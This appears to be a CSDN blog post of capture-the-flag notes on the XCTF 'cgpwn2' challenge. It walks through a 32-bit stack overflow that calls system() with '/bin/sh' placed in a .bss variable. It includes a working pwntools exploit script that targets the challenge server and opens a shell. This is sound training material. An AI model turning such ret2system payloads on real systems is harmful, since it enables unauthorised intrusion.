PWN做题笔记5-cgpwn2(已修订)

本文介绍了如何利用32位ELF文件中未开启ASLR但存在栈保护的漏洞进行栈溢出攻击。通过ida反汇编分析,发现程序有两个输入阶段,第二次输入存在边界检查缺失。利用这个漏洞,构造payload覆盖栈上的参数,调用_system库函数,并通过.bss段的name变量传递/bin/sh字符串。最终成功执行系统命令,获取flag。
摘要由CSDN通过智能技术生成

原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1

32位ELF文件

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 未开启ALSR,但是有栈保护

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 程序实现依次进行两次输入

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 ida反汇编,main函数无注入点,hello函数第二次输入无边界检查,可以溢出

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_12,color_FFFFFF,t_70,g_se,x_16

 由于pwn方法包含了system方法,因此希望调用该方法,此外,需要覆盖参数

9e9b1d62047a451491d767902b21bbfe.png

又由于未提供/bin/sh字符串,需要通过向.bss存储的name传递性相应字符串来获取/bin/sh并作为_system方法的形参。 

name变量地址:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_14,color_FFFFFF,t_70,g_se,x_16 

_system库函数地址:

5c761afd27dd4770bee4bf9e6e330cb1.png 

注入内容构造为:

b"A"*(0x26+4)+p32(0x08048420)+p32(0)+p32(0x0804A080)

代码如下:

from pwn import *
host = '111.200.241.244'
port = 64827

#name:0804A080
#"A"*(0x26+4)+p32(0x0804855A)+p32(0)EBP+p32(0x0804A080)
p = connect(host, port)
payload = b"A"*(0x26+4)+p32(0x08048420)+p32(0)+p32(0x0804A080)
p.sendline("/bin/sh")
p.sendline(payload)
p.interactive()

如图,成功获取flag:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值